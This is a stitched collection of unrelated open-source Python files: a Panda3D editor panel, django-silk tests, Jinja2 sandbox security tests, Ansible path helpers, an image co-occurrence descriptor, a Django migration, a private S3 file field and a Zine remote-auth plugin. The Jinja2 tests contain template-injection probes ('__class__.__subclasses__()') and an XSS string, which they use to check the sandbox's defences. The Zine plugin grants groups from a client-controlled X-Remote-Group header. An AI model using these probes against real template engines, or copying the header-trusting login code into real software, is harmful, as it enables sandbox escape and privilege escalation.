self.gridButton = Checkbutton(
pageFrame,
text = 'Enable Grid',
variable = self.gridVar,
command = self.toggleGrid)
self.gridButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.widgetVisVar = IntVar()
self.widgetVisVar.set(self.widgetVis)
self.widgetVisButton = Checkbutton(
pageFrame,
text = 'Enable WidgetVisible',
variable = self.widgetVisVar,
command = self.togglewidgetVis)
self.widgetVisButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.enableAutoCameraVar = IntVar()
self.enableAutoCameraVar.set(self.enableAutoCamera)
self.enableAutoCameraButton = Checkbutton(
pageFrame,
text = 'Enable Auto Camera Movement for Loading Objects',
variable = self.enableAutoCameraVar,
command = self.toggleAutoCamera)
self.enableAutoCameraButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.backgroundColor = ColorEntry(
pageFrame, text = 'BG Color', value=self.worldColor)
self.backgroundColor['command'] = self.setBackgroundColorVec
self.backgroundColor['resetValue'] = [0,0,0,0]
self.backgroundColor.pack(side=tkinter.LEFT, expand=False)
self.bind(self.backgroundColor, 'Set background color')
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
envPage.pack(expand=False)
## Set all stuff done
self.notebookFrame.setnaturalsize()
mainFrame.pack(fill = 'both', expand = 1)
def createMenuBar(self):
# We don't need menu bar here.
self.menuBar.destroy()
def onDestroy(self, event):
#################################################################
# onDestroy(self, event)
# This function will be called when the user closes the side window.
# Here we will send out a message with the whole data set we will need
# for the next time the user opens the side window.
#################################################################
messenger.send('SW_close',[self.worldColor,
self.lightEnable,
self.ParticleEnable,
self.basedriveEnable,
self.collision,
self.backface,
self.texture,
self.wireframe,
self.grid,
self.widgetVis,
self.enableAutoCamera])
'''
If you have open any thing, please rewrite here!
'''
pass
###############################
def updateInfo(self, page = 'Tree Graph'):
#################################################################
# updateInfo(self, page = 'Tree Graph')
# This function will be called each time the user changes the main
# page of the window.
# What it does is call the right function to restore the data for the currently selected page.
#################################################################
if page=='Tree Graph':
self.updateTreeGraph()
elif page == 'World Setting':
self.updateWorldSetting()
def updateTreeGraph(self):
#################################################################
# updateTreeGraph(self)
# When the scene graph page has been opened, call sceneGraphExplorer to
# update the tree.
#################################################################
self.SGE.update()
pass
def updateWorldSetting(self):
#################################################################
# updateWorldSetting(self)
# When the world setting page has been selected, this function will
# reset the check boxes in the page to reflect the current world setting.
#################################################################
self.LightingVar.set(self.lightEnable)
self.CollisionVar.set(self.collision)
self.ParticleVar.set(self.ParticleEnable)
self.baseUseDriveVar.set(self.basedriveEnable)
self.backgroundColor.set(value = self.worldColor)
pass
def toggleLights(self):
#################################################################
# toggleLights(self)
# send out a message to let sceneEditor know we need to toggle the light.
# Then, sceneEditor will pass the message to dataHolder to disable/enable
# the lights. (lightManager is inside the dataHolder)
#################################################################
self.lightEnable = (self.lightEnable+1)%2
messenger.send('SW_lightToggle')
pass
def showCollision(self):
#################################################################
# showCollision(self)
# This function will send out a message to sceneEditor to toggle
# the visibility of collision objects.
#################################################################
self.collision = (self.collision+1)%2
messenger.send('SW_collisionToggle', [self.collision])
pass
def enableParticle(self):
#################################################################
# enableParticle(self)
# This function will send out a message to sceneEditor to toggle
# the visibility of particle objects.
#################################################################
self.ParticleEnable = (self.ParticleEnable+1)%2
messenger.send('SW_particleToggle', [self.ParticleEnable])
pass
def enablebaseUseDrive(self):
#################################################################
# enablebaseUseDrive(self)
# This function will toggle the usage of base.useDrive.
# Well, it may not be useful at all.
#
# We won't send out any message this time to notify
# the sceneEditor that this event happened.
# In the other hand, we will restore it back when
# the side window has been closed.
#
#################################################################
if self.enableBaseUseDrive==0:
print('Enabled')
base.useDrive()
self.enableBaseUseDrive = 1
else:
print('disabled')
#base.useTrackball()
base.disableMouse()
self.enableBaseUseDrive = 0
self.basedriveEnable = (self.basedriveEnable+1)%2
pass
def toggleBackface(self):
#################################################################
# toggleBackface(self)
# This function will toggle the back face setting, so it will
# render polygons with two sides.
#################################################################
base.toggleBackface()
self.backface = (self.backface+1)%2
return
def toggleBackfaceFromMainW(self):
#################################################################
# toggleBackfaceFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the back face setting in the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.backface = (self.backface+1)%2
self.backfaceButton.toggle()
return
def toggleTexture(self):
#################################################################
# toggleTexture(self)
# This function will toggle the texture usage option for the whole scene.
#################################################################
base.toggleTexture()
self.texture = (self.texture+1)%2
return
def toggleTextureFromMainW(self):
#################################################################
# toggleTextureFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the texture usage from the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.texture = (self.texture+1)%2
self.textureButton.toggle()
return
def toggleWireframe(self):
#################################################################
# toggleWireframe(self)
# This function will toggle the wire frame mode.
#################################################################
base.toggleWireframe()
self.wireframe = (self.wireframe+1)%2
return
def toggleWireframeFromMainW(self):
#################################################################
# toggleWireframeFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the wire frame mode in the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.wireframe = (self.wireframe+1)%2
self.wireframeButton.toggle()
return
def toggleGrid(self):
#################################################################
# toggleGrid(self)
# This function will toggle the usage of the grid.
#################################################################
self.grid = (self.grid+1)%2
if self.grid==1:
SEditor.grid.enable()
else:
SEditor.grid.disable()
def togglewidgetVis(self):
#################################################################
# togglewidgetVis(self)
# This function will toggle the visibility of the widget of the grid.
#################################################################
self.widgetVis = (self.widgetVis+1)%2
SEditor.toggleWidgetVis()
if SEditor.widget.fActive:
messenger.send('shift-f')
return
def toggleWidgetVisFromMainW(self):
#################################################################
# toggleWidgetVisFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the visibility of widgets ('v') from the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.widgetVis = (self.widgetVis+1)%2
self.widgetVisButton.toggle()
return
def setBackgroundColorVec(self,color):
#################################################################
# setBackgroundColorVec(self,color)
# Call back function
# This will be called from the colorEntry on the world setting page.
# The "color" here is a list containing three integer data, R, G and B.
#################################################################
base.setBackgroundColor(color[0]/255.0,
color[1]/255.0,
color[2]/255.0)
self.worldColor = [color[0],color[1],color[2],0]
def toggleAutoCamera(self):
#################################################################
# toggleAutoCamera(self)
# This function will toggle the usage of the auto-camera movement
# when the user loads a model or actor into the scene.
#################################################################
self.enableAutoCamera = (self.enableAutoCamera+1)%2
SEditor.toggleAutoCamera()
return
def selectPage(self,page='Tree Graph'):
#################################################################
#################################################################
self.notebookFrame.selectpage(page)
| {
"content_hash": "eab98eeae04984742163f8870380a484",
"timestamp": "",
"source": "github",
"line_count": 462,
"max_line_length": 122,
"avg_line_length": 41.142857142857146,
"alnum_prop": 0.5167824074074074,
"repo_name": "chandler14362/panda3d",
"id": "96c225c58fafea67c25527280b053ba87174f28a",
"size": "19212",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "contrib/src/sceneeditor/SideWindow.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4004"
},
{
"name": "C",
"bytes": "5288285"
},
{
"name": "C++",
"bytes": "27114399"
},
{
"name": "Emacs Lisp",
"bytes": "229264"
},
{
"name": "HTML",
"bytes": "8081"
},
{
"name": "Java",
"bytes": "3113"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Logos",
"bytes": "5504"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "NSIS",
"bytes": "61448"
},
{
"name": "Nemerle",
"bytes": "3001"
},
{
"name": "Objective-C",
"bytes": "27625"
},
{
"name": "Objective-C++",
"bytes": "258129"
},
{
"name": "Perl",
"bytes": "206982"
},
{
"name": "Perl 6",
"bytes": "27055"
},
{
"name": "Puppet",
"bytes": "2627"
},
{
"name": "Python",
"bytes": "5568942"
},
{
"name": "R",
"bytes": "421"
},
{
"name": "Roff",
"bytes": "3432"
},
{
"name": "Shell",
"bytes": "55940"
},
{
"name": "Visual Basic",
"bytes": "136"
}
],
"symlink_target": ""
} |
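SideWindow above communicates exclusively through Panda3D's global messenger (messenger.send('SW_lightToggle') and friends), leaving sceneEditor to react. A tiny sketch of the receiving side of that pattern, assuming Panda3D is installed; the listener class and handler names are invented for illustration:

from direct.showbase.DirectObject import DirectObject
from direct.showbase.MessengerGlobal import messenger


class ToggleListener(DirectObject):
    """Accepts the same event names SideWindow sends."""
    def __init__(self):
        self.accept('SW_lightToggle', self.on_light_toggle)
        self.accept('SW_collisionToggle', self.on_collision_toggle)

    def on_light_toggle(self):
        print('lighting was toggled')

    def on_collision_toggle(self, collision):
        print('collision visibility is now', collision)


listener = ToggleListener()
messenger.send('SW_lightToggle')
messenger.send('SW_collisionToggle', [1])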
from django.test import TestCase
from mock import Mock, NonCallableMock, NonCallableMagicMock, patch
from silk.collector import DataCollector
from silk.models import SQLQuery, Request
from silk.sql import execute_sql
from .util import delete_all_models
def mock_sql():
mock_sql_query = Mock(spec_set=['_execute_sql', 'query', 'as_sql'])
mock_sql_query._execute_sql = Mock()
mock_sql_query.query = NonCallableMock(spec_set=['model'])
mock_sql_query.query.model = Mock()
query_string = 'SELECT * from table_name'
mock_sql_query.as_sql = Mock(return_value=(query_string, ()))
return mock_sql_query, query_string
class TestCall(TestCase):
@classmethod
def setUpClass(cls):
DataCollector().configure(request=None)
delete_all_models(SQLQuery)
cls.mock_sql, cls.query_string = mock_sql()
kwargs = {
'one': 1,
'two': 2
}
cls.args = [1, 2]
cls.kwargs = kwargs
execute_sql(cls.mock_sql, *cls.args, **cls.kwargs)
def test_called(self):
self.mock_sql._execute_sql.assert_called_once_with(*self.args, **self.kwargs)
def test_count(self):
self.assertEqual(1, len(DataCollector().queries))
def _get_query(self):
query = list(DataCollector().queries.values())[0]
return query
def test_no_request(self):
query = self._get_query()
self.assertNotIn('request', query)
def test_query(self):
query = self._get_query()
self.assertEqual(query['query'], self.query_string)
class TestCallSilky(TestCase):
def test_no_effect(self):
DataCollector().configure()
sql, _ = mock_sql()
sql.query.model = NonCallableMagicMock(spec_set=['__module__'])
sql.query.model.__module__ = 'silk.models'
# No SQLQuery models should be created for silk requests for obvious reasons
with patch('silk.sql.DataCollector', return_value=Mock()) as mock_DataCollector:
execute_sql(sql)
self.assertFalse(mock_DataCollector().register_query.call_count)
class TestCollectorInteraction(TestCase):
def _query(self):
try:
query = list(DataCollector().queries.values())[0]
except IndexError:
self.fail('No queries created')
return query
def test_request(self):
DataCollector().configure(request=Request.objects.create(path='/path/to/somewhere'))
sql, _ = mock_sql()
execute_sql(sql)
query = self._query()
self.assertEqual(query['request'], DataCollector().request)
def test_registration(self):
DataCollector().configure(request=Request.objects.create(path='/path/to/somewhere'))
sql, _ = mock_sql()
execute_sql(sql)
query = self._query()
self.assertIn(query, DataCollector().queries.values())
| {
"content_hash": "a77d2fb65dab46b538092fa81e0ede30",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 92,
"avg_line_length": 33.44186046511628,
"alnum_prop": 0.6356050069541029,
"repo_name": "CloudNcodeInc/silk",
"id": "23c460196aa62cfecd72c74347d2479d18090422",
"size": "2876",
"binary": false,
"copies": "1",
"ref": "refs/heads/dj18",
"path": "tests/tests/test_execute_sql.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12916"
},
{
"name": "HTML",
"bytes": "59924"
},
{
"name": "JavaScript",
"bytes": "61203"
},
{
"name": "Python",
"bytes": "180204"
}
],
"symlink_target": ""
} |
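The mock_sql() helper above relies on spec_set so the mocked query object only exposes the attributes execute_sql is allowed to touch. A standalone illustration of that behaviour using the standard library's unittest.mock (the mock package imported above is its backport):

from unittest.mock import Mock, NonCallableMock

query = Mock(spec_set=['as_sql', 'query'])
query.as_sql = Mock(return_value=('SELECT * from table_name', ()))
query.query = NonCallableMock(spec_set=['model'])

sql, params = query.as_sql()
print(sql)                          # SELECT * from table_name
query.as_sql.assert_called_once_with()

try:
    query.something_else = 1        # not in the spec, so spec_set rejects it
except AttributeError as exc:
    print('blocked:', exc)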
"""
jinja2.testsuite.security
~~~~~~~~~~~~~~~~~~~~~~~~~
Checks the sandbox and other security features.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import pytest
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, \
ImmutableSandboxedEnvironment, unsafe
from jinja2 import Markup, escape
from jinja2.exceptions import SecurityError, TemplateSyntaxError, \
TemplateRuntimeError
from jinja2.nodes import EvalContext
from jinja2._compat import text_type
class PrivateStuff(object):
def bar(self):
return 23
@unsafe
def foo(self):
return 42
def __repr__(self):
return 'PrivateStuff'
class PublicStuff(object):
bar = lambda self: 23
_foo = lambda self: 42
def __repr__(self):
return 'PublicStuff'
@pytest.mark.sandbox
class TestSandbox(object):
def test_unsafe(self, env):
env = SandboxedEnvironment()
pytest.raises(SecurityError, env.from_string("{{ foo.foo() }}").render,
foo=PrivateStuff())
assert env.from_string("{{ foo.bar() }}").render(foo=PrivateStuff()) == '23'
pytest.raises(SecurityError,
env.from_string("{{ foo._foo() }}").render,
foo=PublicStuff())
assert env.from_string("{{ foo.bar() }}").render(foo=PublicStuff()) == '23'
assert env.from_string("{{ foo.__class__ }}").render(foo=42) == ''
assert env.from_string("{{ foo.func_code }}").render(foo=lambda:None) == ''
# security error comes from __class__ already.
pytest.raises(SecurityError, env.from_string(
"{{ foo.__class__.__subclasses__() }}").render, foo=42)
def test_immutable_environment(self, env):
env = ImmutableSandboxedEnvironment()
pytest.raises(SecurityError, env.from_string(
'{{ [].append(23) }}').render)
pytest.raises(SecurityError, env.from_string(
'{{ {1:2}.clear() }}').render)
def test_restricted(self, env):
env = SandboxedEnvironment()
pytest.raises(TemplateSyntaxError, env.from_string,
"{% for item.attribute in seq %}...{% endfor %}")
pytest.raises(TemplateSyntaxError, env.from_string,
"{% for foo, bar.baz in seq %}...{% endfor %}")
def test_markup_operations(self, env):
# adding two strings should escape the unsafe one
unsafe = '<script type="application/x-some-script">alert("foo");</script>'
safe = Markup('<em>username</em>')
assert unsafe + safe == text_type(escape(unsafe)) + text_type(safe)
# string interpolations are safe to use too
assert Markup('<em>%s</em>') % '<bad user>' == \
'<em>&lt;bad user&gt;</em>'
assert Markup('<em>%(username)s</em>') % {
'username': '<bad user>'
} == '<em>&lt;bad user&gt;</em>'
# an escaped object is markup too
assert type(Markup('foo') + 'bar') is Markup
# and it implements __html__ by returning itself
x = Markup("foo")
assert x.__html__() is x
# it also knows how to treat __html__ objects
class Foo(object):
def __html__(self):
return '<em>awesome</em>'
def __unicode__(self):
return 'awesome'
assert Markup(Foo()) == '<em>awesome</em>'
assert Markup('<strong>%s</strong>') % Foo() == \
'<strong><em>awesome</em></strong>'
# escaping and unescaping
assert escape('"<>&\'') == '"<>&''
assert Markup("<em>Foo & Bar</em>").striptags() == "Foo & Bar"
assert Markup("<test>").unescape() == "<test>"
def test_template_data(self, env):
env = Environment(autoescape=True)
t = env.from_string('{% macro say_hello(name) %}'
'<p>Hello {{ name }}!</p>{% endmacro %}'
'{{ say_hello("<blink>foo</blink>") }}')
escaped_out = '<p>Hello &lt;blink&gt;foo&lt;/blink&gt;!</p>'
assert t.render() == escaped_out
assert text_type(t.module) == escaped_out
assert escape(t.module) == escaped_out
assert t.module.say_hello('<blink>foo</blink>') == escaped_out
assert escape(t.module.say_hello(
EvalContext(env), '<blink>foo</blink>')) == escaped_out
assert escape(t.module.say_hello(
'<blink>foo</blink>')) == escaped_out
def test_attr_filter(self, env):
env = SandboxedEnvironment()
tmpl = env.from_string('{{ cls|attr("__subclasses__")() }}')
pytest.raises(SecurityError, tmpl.render, cls=int)
def test_binary_operator_intercepting(self, env):
def disable_op(left, right):
raise TemplateRuntimeError('that operator so does not work')
for expr, ctx, rv in ('1 + 2', {}, '3'), ('a + 2', {'a': 2}, '4'):
env = SandboxedEnvironment()
env.binop_table['+'] = disable_op
t = env.from_string('{{ %s }}' % expr)
assert t.render(ctx) == rv
env.intercepted_binops = frozenset(['+'])
t = env.from_string('{{ %s }}' % expr)
try:
t.render(ctx)
except TemplateRuntimeError as e:
pass
else:
assert False, 'expected runtime error'
def test_unary_operator_intercepting(self, env):
def disable_op(arg):
raise TemplateRuntimeError('that operator so does not work')
for expr, ctx, rv in ('-1', {}, '-1'), ('-a', {'a': 2}, '-2'):
env = SandboxedEnvironment()
env.unop_table['-'] = disable_op
t = env.from_string('{{ %s }}' % expr)
assert t.render(ctx) == rv
env.intercepted_unops = frozenset(['-'])
t = env.from_string('{{ %s }}' % expr)
try:
t.render(ctx)
except TemplateRuntimeError as e:
pass
else:
assert False, 'expected runtime error'
@pytest.mark.sandbox
class TestStringFormat(object):
def test_basic_format_safety(self):
env = SandboxedEnvironment()
t = env.from_string('{{ "a{0.__class__}b".format(42) }}')
assert t.render() == 'ab'
def test_basic_format_all_okay(self):
env = SandboxedEnvironment()
t = env.from_string('{{ "a{0.foo}b".format({"foo": 42}) }}')
assert t.render() == 'a42b'
def test_safe_format_safety(self):
env = SandboxedEnvironment()
t = env.from_string('{{ ("a{0.__class__}b{1}"|safe).format(42, "<foo>") }}')
assert t.render() == 'ab&lt;foo&gt;'
def test_safe_format_all_okay(self):
env = SandboxedEnvironment()
t = env.from_string('{{ ("a{0.foo}b{1}"|safe).format({"foo": 42}, "<foo>") }}')
assert t.render() == 'a42b&lt;foo&gt;'
| {
"content_hash": "2938e7cce5da741224fec1cc505b5959",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 87,
"avg_line_length": 37.212765957446805,
"alnum_prop": 0.547455688965123,
"repo_name": "ThiefMaster/jinja2",
"id": "8e4222e521f742e6f9ce1cd5e4d862a62b10d54d",
"size": "7020",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_security.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Emacs Lisp",
"bytes": "4733"
},
{
"name": "HTML",
"bytes": "1729"
},
{
"name": "Makefile",
"bytes": "601"
},
{
"name": "Python",
"bytes": "1242743"
},
{
"name": "Vim script",
"bytes": "5650"
}
],
"symlink_target": ""
} |
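A compact standalone example of what the sandbox tests above assert: ordinary rendering still works, but reaching into double-underscore internals raises SecurityError instead of leaking data:

from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError

env = SandboxedEnvironment()
print(env.from_string('{{ 1 + 2 }}').render())     # 3

try:
    env.from_string('{{ foo.__class__.__subclasses__() }}').render(foo=42)
except SecurityError as exc:
    print('blocked:', exc)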
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from errno import EEXIST
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_bytes, to_native, to_text
__all__ = ['unfrackpath', 'makedirs_safe']
def unfrackpath(path, follow=True, basedir=None):
'''
Returns a path that is free of symlinks (if follow=True), environment variables, relative path traversals and symbols (~)
:arg path: A byte or text string representing a path to be canonicalized
:arg follow: A boolean to indicate if symlinks should be resolved or not
:raises UnicodeDecodeError: If the canonicalized version of the path
contains non-utf8 byte sequences.
:rtype: A text string (unicode on python2, str on python3).
:returns: An absolute path with symlinks, environment variables, and tilde
expanded. Note that this does not check whether a path exists.
example::
'$HOME/../../var/mail' becomes '/var/spool/mail'
'''
if basedir is None:
basedir = os.getcwd()
elif os.path.isfile(to_bytes(basedir, errors='surrogate_or_strict')):
basedir = os.path.dirname(basedir)
final_path = os.path.expanduser(os.path.expandvars(to_bytes(path, errors='surrogate_or_strict')))
if not os.path.isabs(final_path):
final_path = os.path.join(to_bytes(basedir, errors='surrogate_or_strict'), final_path)
if follow:
final_path = os.path.realpath(final_path)
return to_text(os.path.normpath(final_path), errors='surrogate_or_strict')
def makedirs_safe(path, mode=None):
'''Safe way to create dirs in multiprocess/thread environments.
:arg path: A byte or text string representing a directory to be created
:kwarg mode: If given, the mode to set the directory to
:raises AnsibleError: If the directory cannot be created and does not already exist.
:raises UnicodeDecodeError: if the path is not decodable in the utf-8 encoding.
'''
rpath = unfrackpath(path)
b_rpath = to_bytes(rpath)
if not os.path.exists(b_rpath):
try:
if mode:
os.makedirs(b_rpath, mode)
else:
os.makedirs(b_rpath)
except OSError as e:
if e.errno != EEXIST:
raise AnsibleError("Unable to create local directories(%s): %s" % (to_native(rpath), to_native(e)))
def basedir(source):
""" returns directory for inventory or playbook """
source = to_bytes(source, errors='surrogate_or_strict')
dname = None
if os.path.isdir(source):
dname = source
elif source in [None, '', '.']:
dname = os.getcwd()
elif os.path.isfile(source):
dname = os.path.dirname(source)
if dname:
# don't follow symlinks for basedir, enables source re-use
dname = os.path.abspath(dname)
return to_text(dname, errors='surrogate_or_strict')
| {
"content_hash": "dee642d76a792888f40277a50d9d6d09",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 125,
"avg_line_length": 35.42168674698795,
"alnum_prop": 0.6653061224489796,
"repo_name": "SergeyCherepanov/ansible",
"id": "41ed017ef43e87c44a4c9567c7075ada22bad1fa",
"size": "3653",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ansible/ansible/utils/path.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Shell",
"bytes": "824"
}
],
"symlink_target": ""
} |
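A small usage sketch of the two helpers defined above, assuming Ansible is installed so they import from ansible.utils.path; the paths themselves are only examples:

import os
from ansible.utils.path import unfrackpath, makedirs_safe

# '~' and environment variables are expanded, '..' segments are collapsed,
# and (by default) symlinks are resolved.
print(unfrackpath('~/projects/../ansible-demo'))

# Safe even if several processes race to create the same directory tree.
target = os.path.join(os.path.expanduser('~'), '.ansible-demo', 'tmp')
makedirs_safe(target, mode=0o700)
print(os.path.isdir(target))   # True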
import timeit
import numpy as np
from PIL import Image
class CoMatrix():
''' Co-occurrence matrix class '''
def __init__(self, dx, dy):
''' Initialize the class. Set non-negative distance between neighbours '''
if dx < 0 or dy < 0: raise Exception(u'Neighbour distance has to be non-negative')
self.dx, self.dy = dx, dy # set neighbour distance for co-occurrence matrix
def descriptor(self, path):
''' Return descriptor of the image from the path or None if it is not an image.
Descriptor consists from 3 arrays: rows, columns and non-zero values of
co-occurrence matrix '''
try:
img = Image.open(path) # open image with PIL
except:
print(u'This is not an image: {}'.format(path))
return # return None
array = np.array(img) # convert PIL image to Numpy array, np.uint8
r = array[:,:,0] >> 6 # Red. Leave 2 bit or 4 bins
g = array[:,:,1] >> 5 # Green. Leave 3 bit or 8 bins
b = array[:,:,2] >> 5 # Blue. Leave 3 bit or 8 bins
rgb = (r << 6) + (g << 3) + b # rgb color consists of 8 bits or 256 tints
h, w = rgb.shape # get height and width of the array
h -= self.dy
w -= self.dx
mask = rgb[:h, :w] < rgb[self.dy:, self.dx:]
rows = np.where(mask, rgb[:h, :w], rgb[self.dy:, self.dx:])
cols = np.where(np.invert(mask), rgb[:h, :w], rgb[self.dy:, self.dx:])
comatrix = np.zeros((256, 256), dtype=np.uint32) # create 256x256 matrix
np.add.at(comatrix, [rows, cols], 1)
rows, cols = np.nonzero(comatrix) # get non-zero rows and columns
return rows, cols, comatrix[rows, cols]
def distance(self, descriptor1, descriptor2):
''' Calculate distance between two descriptors and return it as an integer '''
# Restore co-occurrence matrix from descriptor.
# Cannot use np.uint32, because of subtraction of two matrices.
comatrix1 = np.zeros((512, 512), dtype=np.int32)
comatrix1[descriptor1[0], descriptor1[1]] = descriptor1[2]
comatrix2 = np.zeros((512, 512), dtype=np.int32)
comatrix2[descriptor2[0], descriptor2[1]] = descriptor2[2]
return np.absolute(comatrix1 - comatrix2).sum() # sum of abs linear differences
if __name__ == u'__main__':
m = CoMatrix(1, 1) # take bottom right neighbour
d1 = m.descriptor(u'../data/doge.jpg')
d2 = m.descriptor(u'../data/doge2.jpg')
d3 = m.descriptor(u'../data/doge3.jpg')
d4 = m.descriptor(u'../data/city.jpg')
print(u'very small', m.distance(d1, d2)) # doge-doge2
print(u'small', m.distance(d1, d3)) # doge-doge3
print(u'large', m.distance(d1, d4)) # doge-city
n = 100 # number of tests
print(timeit.timeit(stmt=u'm.descriptor(u"../data/doge.jpg")', number=n,
setup=u'from __main__ import m') / n)
print(timeit.timeit(stmt=u'm.distance(d1, d4)', number=n,
setup=u'from __main__ import m, d1, d4') / n)
| {
"content_hash": "756d2ea918652728fc825cc34501d513",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 91,
"avg_line_length": 51.5,
"alnum_prop": 0.5867313915857605,
"repo_name": "foobar167/junkyard",
"id": "34dabd8611c6797ba8e5f921e1f8170513d4c481",
"size": "3114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "co-occurrence_matrix/co-matrix_256bit.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "133"
},
{
"name": "C",
"bytes": "6015"
},
{
"name": "Dart",
"bytes": "8334"
},
{
"name": "Java",
"bytes": "1097"
},
{
"name": "Jupyter Notebook",
"bytes": "10140837"
},
{
"name": "Objective-C",
"bytes": "1412"
},
{
"name": "Python",
"bytes": "495113"
},
{
"name": "Ruby",
"bytes": "2378"
},
{
"name": "Shell",
"bytes": "1468"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('cxbx_compat', '0011_executable_signature_status'),
]
operations = [
migrations.AddField(
model_name='executable',
name='signature_hash',
field=models.CharField(default=uuid.uuid4, max_length=40, unique=False, null=True),
preserve_default=False,
),
migrations.AlterField(
model_name='executable',
name='signature',
field=models.CharField(max_length=512),
),
]
| {
"content_hash": "8a63868bf7379bf3d445b2e95fdf9bf1",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 95,
"avg_line_length": 26.2,
"alnum_prop": 0.6,
"repo_name": "donwayo/xbox-db",
"id": "941dbb0e2d84b97a917189fc660dc57063b2a4a9",
"size": "728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cxbx_compat/migrations/0012_auto_20170419_1349.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "10074"
},
{
"name": "Python",
"bytes": "69025"
}
],
"symlink_target": ""
} |
from django.db.models.fields.files import FileField, FieldFile
from django.http import HttpResponse
from django.core.files.storage import get_storage_class
class ProtectedFileField(FileField):
    """
    A FileField that gives the 'private' ACL to the files it uploads to S3, instead of the default ACL.
    """
    # attr_class = ProtectedFieldFile
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
if storage is None:
storage = get_storage_class()(acl='private')
super(ProtectedFileField, self).__init__(verbose_name=verbose_name,
name=name, upload_to=upload_to, storage=storage, **kwargs) | {
"content_hash": "d33c7c1552f3108a08d2d967b83b7377",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 103,
"avg_line_length": 40.11764705882353,
"alnum_prop": 0.6906158357771262,
"repo_name": "flavoi/diventi",
"id": "31e8a15fa5892aadbcf7851bdd7b6aaee1d52932",
"size": "683",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "diventi/products/fields.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "385265"
},
{
"name": "Procfile",
"bytes": "46"
},
{
"name": "Python",
"bytes": "826530"
}
],
"symlink_target": ""
} |
"""
zine.plugins.example_remote_auth
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Sample plugin that uses remote (web server) authentication instead of Zine's built-in authentication.
"""
from zine.application import Request as RequestBase
from zine.database import db
from zine.utils import forms
from zine.models import User, Group
class Request(RequestBase):
def get_user(self):
# This overrides Zine's default session-based authentication
# with a custom method that looks for environ["REMOTE_USER"]
# and creates the appropriate user in the database if it doesn't
# exist yet. If there is no user logged in, this method should
# return None. The caller will handle the AnonymousUser creation
# in that case.
app = self.app
username = self.environ.get("REMOTE_USER", None)
if not username:
return None
user = User.query.filter_by(username=username).first()
if user is None:
            user = User(username, None, "%s@example.com" % username)  # placeholder e-mail derived from the username
db.session.add(user)
db.commit()
return user
def __init__(self, environ, app=None):
RequestBase.__init__(self, environ)
request_groups = set()
current_user = self.user
# We can add Group associations to the current user
# by assigning its `transient_groups` property to
# a list of Group objects. Here we'll add one Group
# if the user is authenticated, and a different one
# if the user is anonymous; and we'll also give the
# HTTP request a chance to add an additional group.
# Note that the groups must exist in the database;
# we create them here if they don't exist.
if current_user.is_somebody:
request_groups.add("Authenticated")
else:
request_groups.add("Anonymous")
group = environ.get("HTTP_X_REMOTE_GROUP", None)
if group:
request_groups.add(group)
_request_groups = []
for group_name in request_groups:
group = Group.query.filter_by(name=group_name).first()
if group is None:
group = Group(group_name)
db.session.add(group)
_request_groups.append(group)
db.commit()
self.user.transient_groups = _request_groups
def setup(app, plugin):
# The `_request_class` attribute of the app is used to
# create the Request objects; so we need to reassign it
# to our Request subclass in order for our custom
# authentication and authorization logic to be active.
# Note that we just assume that no other plugin is also
# trying to override the default Request!
app._request_class = Request
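    # Deployment note (illustrative, not part of the original plugin): REMOTE_USER
    # is normally injected by the front-end web server, e.g. Apache performing
    # basic authentication, so enabling this plugin is the only change needed
    # inside Zine itself.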
| {
"content_hash": "0747b4f6c74e914bd0d9a61c7e2f99be",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 75,
"avg_line_length": 39.34285714285714,
"alnum_prop": 0.6238198983297023,
"repo_name": "mitsuhiko/zine",
"id": "5c44fe6851e60b800c88155a6af8c98d6649b3ff",
"size": "2778",
